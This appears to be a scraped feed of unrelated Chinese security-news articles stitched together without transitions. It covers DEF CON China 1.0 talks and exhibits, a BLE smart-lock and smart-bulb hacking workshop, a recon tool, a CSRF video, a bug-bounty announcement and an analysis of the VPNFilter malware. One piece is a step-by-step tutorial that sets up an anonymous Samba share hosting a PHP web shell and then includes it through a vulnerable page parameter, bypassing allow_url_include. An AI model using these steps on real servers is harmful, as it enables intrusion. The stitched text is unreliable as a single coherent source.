2019年05月31日,由DEF CON与百度安全联合主办的DEF CON China 1.0正式开幕,来自全球的安全极客汇聚一堂,共同迎接在中国扎根发芽的DEF CON China。

image.png

首先是由百度安全的马杰登场。

image.png

”超过一万公里,跨月十五个时区,二十多年的等待,DEF CON终于正式的在北京与中国极客们见面“。马杰向各位极客们解释今年DEF CON China的主题为什么是未来复古主义:”在那个年代,大家对科技充满热情,人类第一次走向太空,第一次掌握了计算机,人类拥有了很多的科技力量,那时候虽然有冲突,也充满了对未来的美好憧憬。现在也是一样,我们有了更多更好的技术,也遇到了很多挑战,世界在变的有趣的同时,也遇到了很多的问题。极客可以扮演,也正在扮演越来越重要的角色,而社区需要成长,需要你我每个人的力量“

 接下来由DEF CON创始人Jeff Moss向大家分享他对DEF CON China的印象。今年的场地氛围非常好,就像当年DEF CON刚成立时那样,我可以从周围感受到一种创新的能量。”他认为,未来的世界将会变得更加复杂,“我们需要去告诉这个世界什么技术是安全的,什么是不安全的,这是我们的工作所在。”他鼓励各位极客们不断尝试,不惧怕失败。“从算法到规则,不管技术强大到什么地步,都需要由人来去定义、去解决。而我们正是要去解决这些问题的人,在此我们也将实现个人的成长。”

image.png

随后由JeffMoss邀请Joe Grand向大家分享胸卡设计与制作的历程,今年的胸卡设计原型是要设计成一棵树,这棵树将延续Joe自己对胸卡的定义——简洁、易扩展、通过交互式命令可以探索更多。在确定使用柔性印刷电路板的时候,Joe在设计原型过程中,与中国的制造商进行了大量的交流,在交流中终于将首个柔性印刷电路板胸卡推进到量产。Joe向大家分享了这个胸卡使用的Arduino固件以及使用闪存和内存的量,还有在操作中考虑到的电力供应均衡方案——例如10秒无移动自动休眠。在最后他还向大家分享了关于主会场后面的”集装箱“的奥秘,那就是”无极之树“——参考《银翼杀手》的赛博朋克世界的科技之树,将胸卡插入对应的插口后,将在点亮胸卡的同时,在无极之树上添加上自己的独一无二的树叶。

image.png

随后是来自百度安全的兜哥向大家分享如何做到花费少量资源攻破远端图像分类的黑盒防线。相对于以前的方法,他们提出了一种新的攻击方法,即基于替身模型的FFL-PGD攻击,这种攻击方法以非常有限的查询数量实现高攻击成功率。相对于以前的研究中使用黑盒攻击那样需要数千到数百万个查询,基于替身模型的FFL-PGD攻击平均生成每个对抗样本仅查询2次。 同时,他也分享了百度安全团队首次尝试对真实世界基于云的图像分类器服务的黑盒攻击进行广泛的实证研究。通过对包括亚马逊, 谷歌,微软,Clarifai在内的四个流行云平台的评估,证明了Spatial Transformation (ST) 攻击的成功率约为100%,除了亚马逊大约50%,FFL-PGD 攻击的成功率在不同的分类服务中超过90%。

image.png

DEF CON的议题分享并没有在午餐时间中止,来自腾讯移动安全实验室的韩紫东向大家分享了针对Hybrid应用和物联网设备的一类新攻击面——桥接攻击。这种抽象的桥通常由一些自定义方案或协议来实现,在某些情况下,桥的拓展能力会降低局域网中智能设备的安全防御级别,可被利用达到持续利用漏洞的效果。此时的Hybrid应用和物联网设备的安全性大大降低,甚至是导致远程代码被执行,敏感数据可能会泄露,物联网设备也可能会被他人控制。

image.png

到了下午,资深安全研究员 Christopher Wade向场下各位极客分享NFC通信协议在卡片端的攻击。在分享中,他讲了关于NFC信息传的基本原理、破解Mifare加密秘钥的方法、针对NFC读取器的攻击等。他还在分享中提到了如何使用其他卡片NFC信息的方法,包括DIY硬件的演示。

image.png

随后,去年以物理(武力)损毁磁盘保证数据安全的老朋友zoz这次来讲自动驾驶的安全问题。自动驾驶的安全问题一般都来自于车身上大量的传感器,一旦传感器传输了错误的信号,就会造成悲剧。Zoz从几个方面入手,分别分析了影像传感器、红外传感器、镭射传感器、GPS传感器等众多传感器的功能,以及每种传感器可以通过哪些方式进行干扰和劫持方法。

image.png

在讲到GPS传感器的劫持方法的时候,Zoz拿出了用Hackrf改装的GPS劫持工具,并将GPS信号劫持成了美国白宫的坐标,小编自己的iPhone6sp成功见证了自己不出国门就”飞“到白宫的时刻。

1559297178790004.png

来自腾讯游戏安全的朱学文分享的议题是《游戏安全攻防艺术》,朱学文拿出了腾讯游戏在绝地求生和刺激战场火爆背后的外挂市场的嚣张——绝地求生外挂数量超过2700款,高峰期每天有超过100款外挂更新!同时,也根据腾讯游戏庞大的用户群体数量,绘制了中国网游作弊用户分布图,并分享了外挂具体会在哪些方面进行开发,还有他们的利益链条。

image.png

image.png

今天最后一个议题是《.NET没有秘密》,.NET由于已经成为了WIndows预装的软件,导致很多恶意程序也会在Microsoft Word、Excel和PowerPoint等文件中插入相关恶意代码,从而实现不可告人的目的。虽然局势这么危险,但是由于.NET具有很强大的功能,我们依旧可以通过.NET来对恶意代码进行行为监控。

image.png

DEF CON China 1.0的第一个活动日已经结束,明天在79罐还有更多议题等待着我们,晚上还有沉浸式极客音乐会,我们明天再见。

u=3750265694,1871277637&fm=26&gp=0.jpg

最近总是发生一些奇怪的事儿,家里的灯时常忽明忽暗;明明睡觉前管好的门,醒来时却发现莫名其妙的打开了!

上述如恐怖电影般的场景,其实在生活中不难发生。为什么说如此诡异的事情会在我们生活中出现呢?

DEF CON China 1.0 主题为“Capturing, Analyzing and Faking BLE Communication”(捕获、分析和伪造BLE通信)的Workshop诠释了这一场景的出现。

DEF CON China 1.0 Workshop

微信图片_20190531145347.jpg

Workshop主题:捕获、分析和伪造BLE通信。身为技术毒瘤的小编起初看到这个标题有些小蒙,翻看会议资料介绍了解到,这个Workshop原来是针对于我们日常生活中经常使用的智能设备的研究。既然与我们日常生活息息相关,不妨进去一探究竟。

该Workshop演讲者分别是胡一米和郭韬,他们都是DC0086成员,来自北京未来安全信息技术有限公司,胖猴实验室的高级安全研究员。

微信图片_20190531154405.jpg沉浸在灯泡中的Speaker

在这个Workshop上,演讲嘉宾选取了3款生活中常用的智能设备作为研究对象,分别是:

· 智能灯泡

· 智能门锁

· 智能手环

他们大胆的模拟了一个场景,如果他们想黑掉一个目标进入其家中,他们可以做到先把关灯关掉,然后神出鬼没的把门打开,大摇大摆的走进去,然后做一些想做的事儿。

智能灯泡破解

微信图片_20190531155555.jpg首先演讲嘉宾介绍了一些基础的蓝牙知识,了解这些基础知识有助于之后的破解。

智能灯泡的生产商提供了一款名为LifeSmart的App用于对灯泡进行控制,通过该程序绑定智能灯泡后,可以调节其颜色和亮度。

他们的入手点就是这款操作智能灯泡的App:LifeSmart。

微信图片_20190531153155.jpg

通过Android Killer这个免费的安卓调试工具,对LifeSmart的日志进行分析,总结出LifeSmart对灯泡亮度的控制方法后,再使用一个叫nRF Connect的App模拟对灯泡的控制。成功利用后,可以不经绑定随意调节智能灯泡的亮度,从而达到关灯的效果。

既然灯已经关了,那么接下来就是要考虑怎么进门了。

智能门锁破解

首先要了解智能门锁的操控流程,最普遍的方式是通过App对门锁进行控制:首先要对门锁进行绑定,然后成功连接门锁并进行操作。

破解思路大致与智能灯泡类似,都是对其App下手,首先对安卓APK进行逆向分析,发现手机对门锁的控制主要是通过一组Key完成的。通过对BLE通信数据进行抓包,可以计算出这组Key,而将这组Key写入到一台未绑定该门锁的手机中,就可以在这台手机上可以实现对门锁的控制。

这里演讲嘉宾为大家提供了BLE抓包需要的CC2540 Dongle ,利用该设备搭配SmartRF Packet Sniffer进行抓包。

微信图片_20190531150025.jpg上图就是这次破解门锁的关键道具,据说这个小小的抓包设备只需50元左右就可以买到。

该Workshop所涉及的所有工具及App都是免费的,也就是说,完成上述一系列的操作只需40元就可以办到。没错,极客们的世界就是这么疯狂。

理论与实践相结合Workshop当然少不了动手,在演示完破解流程后,演讲嘉宾除了给大家提供相同的设备进行破解技术复现外,还提供了类似的智能灯泡和门锁设备,破解思路大同小异,主要是让大家举一反三,牢固掌握破解技巧。

智能手环破解

Workshop的最后一部分其实是一个破解游戏。在场的每个人都会拿到一个智能手环,这个智能手环会记录佩戴者的步数。演讲嘉宾会收集所有手环的步数信息,并设置一个排行榜展示这些信息。根据游戏提示,请尽你所能,想办法占据排行榜榜首,最终争夺榜首者将获得一份精美的礼品。

微信图片_20190531150447.jpg

小编的第一想法就是拿着手环跑个5公里,不过在众多极客面前,使用笨重的方法取得胜利基本上是渺茫的。根据游戏提示,明显可以看出这个智能手环是可破解的。

总体看来,这个Workshop的内容还是比较有趣的,在趣味和实践中提升技能的这种学习方式,恐怕也只有DEF CON China能做到了。

由于小编对技术也是一知半解,所以具体技术细节及实战操作还需亲身体验。明天的10:00-14:00,2号会议室还会有他们的Workshop分享,该Workshop要求参与者具备初级Android开发/逆向或嵌入式开发/逆向经验(也会考虑到没有相关经验的同学们)。需要准备装有Windows 7或更高版本Windows系统的笔记本电脑,而且建议使用Android手机。感兴趣的朋友可以来学习和挑战下。

a.png

今天给大家介绍的是一款名叫FinalRecon的开源情报收集工具,这是一款多合一的多功能网络侦查工具。该工具采用Python开发,遵循模块化架构,可为广大研究人员的网络侦查活动提供帮助。

功能介绍

FinalRecon可提供如下所示的详细信息:

Header信息

b.png

WHOIS查询

c.png

SSL证书细节

d.png

网络爬虫

e.png

注:该工具支持的模块功能仍在添加中…

支持平台

1、 Kali Linux v2019.1

2、 BlackArch Linux

工具安装

git clone https://github.com/thewhiteh4t/FinalRecon.git

cd FinalRecon

pip3 install -r requirements.txt

工具使用

python3 finalrecon.py -h

usage:finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--full]

                     url

FinalRecon- OSINT Tool for All-In-One Web Recon | v1.0.0

positional arguments:

  url        Target URL

optional arguments:

  -h, --help show this help message and exit

  --headers  Get Header Information

  --sslinfo  Get SSL Certificate Information

  --whois    Get Whois Lookup

  --crawl    Crawl Target Website

  --full     Get Full Analysis, Test All Available Options

检测Header:

 python3 finalrecon.py --headers <url> 

检测SSL证书:

 python3 finalrecon.py --sslinfo <url> 

检测WHOIS信息:

 python3 finalrecon.py --whois <url> 

爬取对象:

 python3 finalrecon.py --crawl <url> 

完整扫描:

 python3 finalrecon.py --full <url> 

工具截图

f.png

项目地址

FinalRecon:【GitHub传送门

* 参考来源:thewhiteh4t,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件访问

在PHP配置文件中,“allow_url_include”wrapper默认设置为“Off”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止加载SMB URL。而这就极有可能被滥用来从SMB共享加载远程托管的PHP Web shell。

攻击场景概述

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何的凭据,易受攻击的应用程序将包含Web shell的PHP代码。

首先,我重新配置了PHP环境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名浏览访问的SMB服务器。一旦SMB共享准备就绪,我们就可以利用易受攻击的应用程序了。

PHP 环境设置

将托管易受攻击代码的机器上的“allow_url_fopen”和“allow_url_include”设置为“Off”

以下是版本为“5.5.11”的PHP当前配置截图:

利用SMB共享来绕过php远程文件包含的限制

在继续下一步之前,让我们确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

利用SMB共享来绕过php远程文件包含的限制

可以看到,当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有包含远程文件。

使用匿名浏览访问配置 Samba 服务器(Linux 机器)

使用以下命令安装Samba服务器:

apt-get install samba

创建SMB共享目录:

mkdir /var/www/html/pub/

利用SMB共享来绕过php远程文件包含的限制

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

利用SMB共享来绕过php远程文件包含的限制

运行以下命令,删除SAMBA服务器配置文件的默认内容。

echo > /etc/samba/smb.conf

将以下内容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

现在,重启SAMBA服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart 

成功重启SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求提供凭据。

在本例中,SAMBA服务器IP为192.168.0.3,我需要访问Windows文件浏览器中的SMB共享,如下:

\\192.168.0.3\

利用SMB共享来绕过php远程文件包含的限制

在 SMB 共享中托管 PHP Web shell

太棒了!可以访问smb共享,并显示目录“ica”存在。

现在,将PHP shell托管在目录“/var/www/html/pub”中,该目录为smb共享目录“ica”。

利用SMB共享来绕过php远程文件包含的限制

成功托管PHP shell后,我们使用Windows文件浏览器访问SMB共享目录“ica”。

\\192.168.0.3\ica\

可以看到php shell存在于smb共享目录中,在本例中为box.php文件。

利用SMB共享来绕过php远程文件包含的限制

利用文件包含易受攻击的参数

让我们使用这个PHP shell SMB链接,以及易受攻击的php代码浏览它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

PHP易受攻击的代码从SMB共享中获取了web shell,并在应用程序服务器上执行了代码\m/。我们已经绕过了php远程文件包含的限制,并包含了托管在远程主机上的Web shell。

利用SMB共享来绕过php远程文件包含的限制

 *参考来源:mannulinux,FB小编secist编译,转载请注明来自FreeBuf.COM

内容介绍

CSRF,跨站请求伪造(Cross-Site Request Forgery),这是一种常见的Web攻击方式,但很多开发人员对它却很陌生,甚至有些安全工程师都对它的利用条件和危害知悉较少。简单来说,就是攻击者诱使受害者去访问一个恶意网页,之后,就会在另一个目标网站中以该受害者身份发起经过构造的恶意请求,执行一种恶意操作,这种伪装成其他用户身份在第三方站点执行操作的攻击就称为CSRF攻击。CSRF看似普通,但在某些场景条件下,却能导致强大的破坏性。

CSRF攻击和同源策略(SOP)、跨域资源共享(CORS)之间有什么关系?如果目标服务端对请求的GET和POST方法做了区分,那又有什么办法来执行CSRF攻击呢?在流行的API架构中,我们如何来伪造POST到服务端的JSON数据呢?CSRF+FLASH+HTTP 307的综合利用为什么值得尝试?本视频中,我们围绕一个表单(Form)形式的POST请求,对以上问题做出解答。当然,更好的是,视频开始之前,希望你对SOP和CORS的具体机制有所了解;视频结束之后,能认真分析讲师给出的案例。

观看视频

看不到视频点这里

案例:

《Github中由CSRF导致的RCE漏洞》

《CSRF+FLASH+HTTP 307的综合利用实例》

*本课程翻译自Youtube精选系列教程,喜欢的点一波关注(每周更新)!

* 本文作者:Darry端,FreeBuf视频组荣誉出品,转载须注明来自FreeBuf.COM

5c667b582b42d.jpg

对于安全圈的朋友来说,今天是个大日子,因为地表最顶级的安全会议DEF CON又来到了中国。

经过首届DEF CON China Beta经验的吸取,DEF CON China 1.0会有怎样的突破?有什么亮点?有哪些有趣的环节?今天,嘶吼小编将走进会场,揭秘DEF CON China 1.0的各种套路。

小编早早的就来到活动举办地点,找到一个侧门,走近发现不知道是哪位壮士已迫不及待的破门而入了。

微信图片_20190531102213.jpg

跟随英雄的脚步,小编屏住呼吸顺利的通过了此处,来到了慕名已久的751D·PARK,DEF CON China 1.0的会议现场。

微信图片_20190531105607.jpg

会场风格极为吸引人眼球

大会的签到处,各路武林高手已经排上了长队,放眼国内的安全会议中,可以造就这样繁荣盛世的恐怕也就只有DEF CON China可以做到了。

1111.jpg

签到处

DEF CON China 1.0徽章暗藏玄机

历届DEF CON的徽章都是焦点般的存在,它不仅是大会通行凭证,还是极客身份的象征,更是智慧与实践的结晶。

微信图片_20190531103821.jpg

DEF CON China 1.0媒体参会徽章

徽章是由一个树形的电路板组成的。据了解,它采用的是弹性PCB(柔性电路板),主办方为此花费了不少心思,而且徽章暗藏玄机。

探索一圈后了解到,在不同的Village完成任务后,就会点亮徽章上的灯,让徽章变得更加亮眼,更具神秘感。

在DEF CON China 1.0的主会场还有一个与徽章有关联的神秘空间,据说收集参会嘉宾的徽章会看到一颗大树悄然生长,赋予此空间无限生机!

12.jpg

主会场关于徽章彩蛋

点亮空间里的大树需要将你的徽章插入“能量接口”,生机之光将灌入其中,抬头可以寻找属于你的那片枝叶。当你不断在DEF CON CHINA 1.0中解锁成就时,你的那片枝叶也将继续“生长”,并成为茂叶之中最闪亮的“那颗星”。

微信图片_20190531105159.jpg

而且这个神奇的徽章还是完全用开放源代码可破解的,在DEF CON China 1.0黑掉”DEF CON China 1.0胸卡的Workshop中,历届DEF CON胸卡设计者Joe Grand将亲临现场,为参与者进行现场实战讲解。

到这里还不算完,您还可以在大会结束后回家继续探索,挖掘徽章中的更多秘密。

细节决定成败,一个小小的徽章,就有如此之多的玩法,DEF CON China 1.0绝对是一个用心打造的顶级极客峰会。

DEF CON China 1.0百态

微信图片_20190531102544.jpg

这个看起来像“斯巴达克斯角斗场”的大罐就是DEF CON China 1.0主会场,我们也将在这里进行维持三天的技术研讨大会。

微信图片_20190531110034.jpg

复古未来主义风格凸显出了大会的科技感

大罐四周的露天场地布置了各种活动区域,包括Village、太和殿、展台、休息区等。

其中Village的声势浩大,各种主题的Village都挤满了好奇的参会者,各村长也是有些应接不暇的感觉。

微信图片_20190531110232.jpg

门庭若市的Village

本届DEF CON China 1.0含有10个Village供大家学习交流,由于时间的缘故,小编在此就不一一解读了,Village的具体详情将于明天奉上,请大家随时关注。

微信图片_20190531110447.jpg上图建筑名为太和殿,是用榫卯结构搭建而成的,象征中国极客的智慧。据说在大会的最后一天,这个建筑才会搭建完成。

微信图片_20190531110820.jpg

上图这片区域是DEF CON China 1.0展台位置,各展台分别提供了不同的趣味游戏和周边礼品。

微信图片_20190531110828.jpg飞镖大师赢得精美T恤

微信图片_20190531110825.jpg美女挑战10秒游戏成功

微信图片_20190531112648.jpg这就是小编之前爆料的艺术大师Mar Williams,Mar将会为我们的嘉宾现场绘制多块壁画作品,作品全部完成后,现场会送给幸运的嘉宾,这其中的意义肯定是非凡的。

炎炎夏日突然一股清流映入眼帘:

微信图片_20190531112102.jpg这个类似于刑场设备的东西是一个有趣的项目,据说这个为DEF CON China 1.0的Boss量身打造的,Boss受刑时小编一定到场。

微信图片_20190531111427.jpg

主会场对面的一片区域另有乾。进入其中,BCTF对抗赛的视觉设计让人眼前一亮,可视化的LED屏幕尽显王者风范。各站队纷纷落座,认真的进行比赛,争夺那份期待已久的荣誉。

微信图片_20190531111423.jpgBCTF旁边是开锁Village,中间有个三面都门的空间,具体用意是个谜,有可能是要把人关在里面让他自己想办法开锁出来,这个场景模拟有点刺激。

微信图片_20190531111658.jpg

桌子上由如子弹头一般的东西就是这个Village的关键道具——锁芯

微信图片_20190531112055.jpg

跟随路标指示找到了最后的一个区域,避开繁荣的闹市,这里是专门为Workshop打造的世外桃源。国内外的极客人才将汇聚于此,进行研讨与交流,提升极客技能。

微信图片_20190531112059.jpgDEF CON China又一次来到了中国,这里有太多有趣的故事,这里有太多的情怀。它为国内外极客们提供了一个交流的平台,让国内技术发展与世界接轨,激励我们不断的学习,不断的成长。

5月29日举办的2019补天白帽大会上,国内外上千名网络安全顶尖攻防人才就漏洞技术、安全事件进行了研讨和分享,同时随着“补天五星计划”在大会上的发布,补天漏洞响应平台跻身全球三大漏洞平台之列,成为国内首家全面覆盖全品类漏洞的第三方漏洞响应平台。

补天五星.jpg

当前,随着物联网、云计算、大数据、5G等新技术新应用的普及,海量数据大集中的趋势日益明显、企业数据聚集规模快速膨胀,利用漏洞窃取用户数据、加密勒索等网络安全风险日益突出。
为此,作为企业和白帽子之间的桥梁,补天漏洞响应平台在2019补天白帽大会上隆重发布“补天五星计划”,针对现阶段我国政企机构网络安全所面临的新风险,将漏洞响应范围从原来的Web漏洞为主,升级化为Web、移动APP、 IOT、工控、操作系统等五大方向,全面覆盖了新一代网络安全环境下的各种漏洞风险,补天平台也由此成为国内第一家覆盖全品类漏洞的第三方漏洞响应平台。
“网络安全的本质是攻防对抗。”奇安信集团总裁吴云坤表示,作为网络安全工作者,应通过“44333”的新一代网络安全体系思想,构建起一种应对和对抗“争夺权利和利益”的攻击者的能力,同时,新时代网络安全防护需要以人为核心,实现安全与信息化的“全面覆盖、深度结合、有效检测、协同响应”。而补天漏洞响应平台便是专门针对攻防人才发现和培养,汇聚民间安全群体(白帽子)、安全从业者以及技术精英,共同维护政企机构的网络安全。
补天漏洞响应平台负责人白健表示,随着漏洞响应品类的增多,应该有更专业的平台,把民间的网络安全攻防技术达人与企业的网络安全需求更好关联在一起。补天五星计划是一个长期的全品类漏洞收集与响应计划,以互联网众包的方式汇聚白帽子的安全能力,持续为国内企业的漏洞响应提供支持,实现漏洞的及时发现与修复,维护企业网络安全、解决数据泄露隐患、降低加密勒索风险、发掘并培养网络安全人才。
目前,补天平台目前的白帽子注册数量已经超过5万多名,收集的漏洞总数已经突破34万,漏洞涉及到的企业多达7万多家。

概述

Cisco Talos团队在2018年5月23日首次披露了VPNFilter的存在。该恶意软件随即成为全球范围内的头条新闻,因为它是由一个民族主义国家开发的一种复杂的恶意软件,总计感染了50万台设备,并且还将会造成严重的破坏。然而,这场攻击者策划的袭击最终得以避免,原因在于FBI占用了攻击者的命令与控制(C2)基础设施,从而防止向受感染的设备广播命令。由于攻击者失去了对受感染系统的控制,所以也就防止了潜在的灾难性后果。

这一安全事件,实际上为我们敲响了警钟,提醒网络安全社区的成员,要注意防范一种新型的具有国家支持背景的威胁,这类威胁可以在全球范围内攻陷广泛的设备,同时隐藏攻击的来源,并最终导致网络瘫痪。

这是VPNFilter的故事,也是我们在今后要避免的灾难。

选取目标网络

对于攻击者来说,网络基础设施是一个诱人并且有用的目标。与任何计算机系统一样,路由器和交换机等网络设备中,可能包含允许攻击者入侵的漏洞或错误配置。一旦遭受攻击,这些设备就可以作为入侵的跳板,搜索并攻击其他更多的系统,或者可以按照攻击者的意愿修改设备的原始功能,并拦截、修改或重新路由网络流量。与许多其他计算机系统不同,在路由器和交换机上,不太可能会运行反病毒软件,甚至也不太可能受到管理员的过多注意。

在VPNFilter被披露之前的几周内,网络基础设施就明显成为了具有国家背景的威胁参与者的目标。我们监测到了与俄罗斯有关的威胁参与者的活动,与此同时世界各国政府机构也分别发布了针对恶意组织的安全建议。

VPNFilter活动痕迹

在2015年12月,有人注册了一个不显眼的域名toknowall.com。2017年5月4日,原本指向保加利亚的一个托管服务商的该域名,更改为指向法国托管的一个IP地址。尽管当时还不为人所知,但后来证明,这是攻击者与VPNFilter进行通信的手段之一。在2018年5月23日消除威胁之前,该域名始终保持活跃状态。

时间推移到2017年8月底,FBI已经意识到家用路由器出现了一些异常行为。一些设备会尝试连接到Photobucket帐户以下载图像,而这种行为显然是由恶意软件感染导致的。

实际上,威胁参与者同时在Photobucket帐户和toknowall.com域名上都托管了图像,其中威胁参与者用来向恶意软件发出指令的C2服务器IP地址被隐藏,伪装在图像的EXIF元数据中。

2018年3月,其他恶意软件样本被发现,这些样本也与Photobucket有关,并且在Photobucket不可用的情况下自动使用toknowall.com域名作为备选方案。通过对恶意软件样本进行分析,我们发现,威胁参与者在该恶意软件中出现了一个失误,也为安全研究人员提供了一条重要的线索。

为了使恶意软件中的重要数据不被外界轻易获取,恶意代码使用RC4的加密算法实现加密。但是,实现该算法的代码中存在一个微妙的错误,这个错误与针对乌克兰和其他地区的BlackEnergy攻击中所使用的代码具有相同之处。由于在两次攻击中使用了相同的代码,因此政府机构将这些攻击归因到名为APT28(或Sofacy)的恶意APT组织。

关于BlackEnergy和APT28

每个威胁活动的恶意组织,都具有其独特的运营模式、首要选项和特征,而这些内容将会具体体现在实际的攻击之中。例如,众所周知,恶意组织123通过分发与朝鲜半岛政治相关的文件来进行攻击。相比之下,威胁参与者Rocke试图通过从Git存储库下载代码来在被攻陷设备上安装加密货币挖掘软件。威胁行为者通常会重复使用代码或基础设施,这样就使得研究人员能够识别特定的威胁行为者并跟踪他们的活动。

APT28,也被称为Sofacy或Grizzly Steppe,是安全分析人员重点关注的恶意APT组织之一。毫无疑问,这个威胁行动者是俄罗斯情报部门的一部分,该组织非常活跃,并且可能会导致混乱的发生。

BlackEnergy攻击是该恶意组织最臭名昭著的攻击之一。BlackEnergy攻击在2015年12月破坏了乌克兰的供电,导致全国范围内的广泛停电。此次攻击的一大特点是,在攻击完成后将擦除磁盘,从而导致受感染的设备无法操作,并破坏应急响应过程中所需的证据,而这些证据本来可以用于准确理解攻击是如何进行的。

考虑到这种破坏系统和防止恢复的意图,所以在分析VPNFilter时,迅速响应是非常重要的因素之一。

攻击者的能力和目的

VPNFilter试图利用各种网络设备,影响了至少54个国家的50多万台设备。恶意软件的模块化体系结构允许威胁行为者安装各种不同的模块,以便利用受感染的设备进行不同的恶意活动。

最简单的是,恶意软件中包含“变砖”的能力,即使受感染设备永远无法操作。除此之外,恶意软件也可以作为网络上的跳板,并且随后用于发现和攻击与被攻陷设备相连接的其他系统。其中,有一个特定的模块,包含识别和监控Modbus网络流量的功能,这是工业控制系统中最为广泛使用的协议。

另一个模块允许恶意软件创建一个包含许多被攻陷系统的巨型Tor网络。该网络可能允许攻击者伪装从其他受感染系统发起攻击,或者伪装发送窃取数据的最终目的地。

显然,此次攻击的目标之一是捕获数据,特别是用户名和密码。该恶意软件能够将加密的HTTPS连接降级为未经加密的HTTP连接,然后保存该流量以备将来收集。类似地,恶意软件还能够识别、记录和收集看起来像是用户凭据或授权令牌的任何内容。

由于恶意软件感染路由器,将其网络流量定向到攻击者特定的目的地,因此恶意软件可以修改路由信息,并为某些流量创建自定义的目标,从而将流量从真正的目标重定向到攻击者控制的独立系统。所有这一切,都是在最终用户没有收到任何提示的情况下实现的。

应急响应

受影响的系统数量,在2018年春季中持续增长。然而,在5月8日和5月17日两天,我们观察到新感染的用户数量出现急剧增加。突然增加的用户几乎完全集中在乌克兰,这也表明恶意组织即将准备对该国发动攻击。

当时,Cisco Talos团队与个人团队和公共部门的伙伴进行了通力合作,尝试消除威胁。联邦调查局带领团队成功发现了C2基础设施,与此同时,Talos将该威胁事件告知行业联盟组织网络威胁联盟的所有成员,以确保整个网络安全行业能够共同行动,以消除威胁。

该行动取得了广泛的支持。执法部门关停了攻击者的C2基础设施,从而削弱了攻击者向受感染系统发送命令的能力。网络安全行业更新了安全产品的规则,从而能够检测并阻止VPNFilter,同时也面向用户发布如何进行安全防护的建议。

我们可能永远不会知道此次攻击的确切目的。根据感染数量大量增加的日期,我们推测攻击者可能选择在6月29日(乌克兰宪法日)、6月27日(NotPetya安全事件周年纪念日)或5月28日(正统五旬节)这些特殊的时间节点发动攻击。乌克兰国家安全局表示,这次袭击可能是为了扰乱5月26日在基辅举行的欧洲冠军杯联赛决赛。

防护方案

VPNFilter部分驻留在内存中,部分驻留在其感染的设备的存储介质上。在重新启动设备后,将会清除恶意软件在内存中驻留的部分,但不会阻止驻留在设备存储中的恶意软件启动与命令和控制(C2)系统的联系。但是,一旦C2被关停,恶意软件的持久化部分就无法再接收指令。

我们可以通过将设备重置为出厂设置,来清除残余的恶意软件,然后将设备升级到最新版本,以修复漏洞。尽管目前尚不清楚具体利用了哪些漏洞来实现安装VPNFilter,但所有受到攻击的设备都具有一些当前已知的漏洞。

考虑到外围网络设备在网络拓扑中的位置,这些设备往往是最先受到攻击的部分。而假如这部分设备具有已知未修复的漏洞,那么它们就可能会受到APT28等威胁参与者的攻击。

保持此类设备的漏洞及时修复,并保证其正确配置,是确保网络环境安全的一个重要组成部分。但反而言之,如果无法确保这一点,那么就需要将设备放置在下一代防火墙后面,以使在攻击影响存在漏洞的设备之前检测到相应事件,并阻止攻击。

提高警惕性,也是保证网络整体安全的一个组成部分。首先,可以通过识别受感染设备的异常网络行为来检测VPNFilter。理想情况下,可以在网络中部署传感器(探针),检测疑似攻击者的可疑行为,并及时进行告警。

总结和后续展望

Cisco Talos团队与FBI开展紧密合作,共同致力于识别和防范VPNFilter。该恶意软件的多阶段模块化平台,支持以智能化的方式收集目标信息,同时支持破坏性的网络攻击操作。该恶意活动成功感染了至少54个国家的50多万台设备。这种恶意软件可能被用于进行大规模的破坏性攻击,这会使得受感染的物理设备无法使用,同时也能切断数十万用户的互联网访问。然而,通过我们对威胁的识别和阻断,在加上与个人和相关部门的通力合作,最终在灾难发生之前就阻止了袭击。

在此次事件中,不同组织之间发挥了良好的合作,这是前所未有的。实际上,“做好情报保密以保证行动安全”与“与合作伙伴共享情报以实现共同行动”之间始终存在一个平衡点,一旦处于二者的平衡,将会最大化对威胁行为者的影响,同时可以有效降低攻击的严重程序。有证据表明,在应对VPNFilter事件的过程中,Talos所参与的网络威胁联盟发挥了一定的价值,此次行动也将鼓励其他个人或组织积极参与到我们的威胁数据共享之中。

安全人员通过分析VPNFilter的各种恶意模块,能够深入了解威胁行为者的目标和思路。值得注意的是,在感染路由器后,威胁行为者将网络流量从预期的合法目标重新路由到恶意目标。进而推知,这种能力也可以用于进一步收集用户名和密码,并且还可以通过将网络流量传递到预期目的地之前拦截并读取网络流量,从而进行中间人攻击。

APT28只是继续尝试破坏性攻击的众多威胁参与者的一个典型代表。Talos团队最近发现了Sea Turtle恶意活动。尽管该攻击背后的未知威胁行为者并非APT28,但它们还尝试重新路由互联网流量,以便进行中间人攻击,并收集用户凭据。但不同的是,该恶意组织通过攻击互联网的DNS基础设施,以一种与VPNFilter截然不同的方式实现了他们的目标。

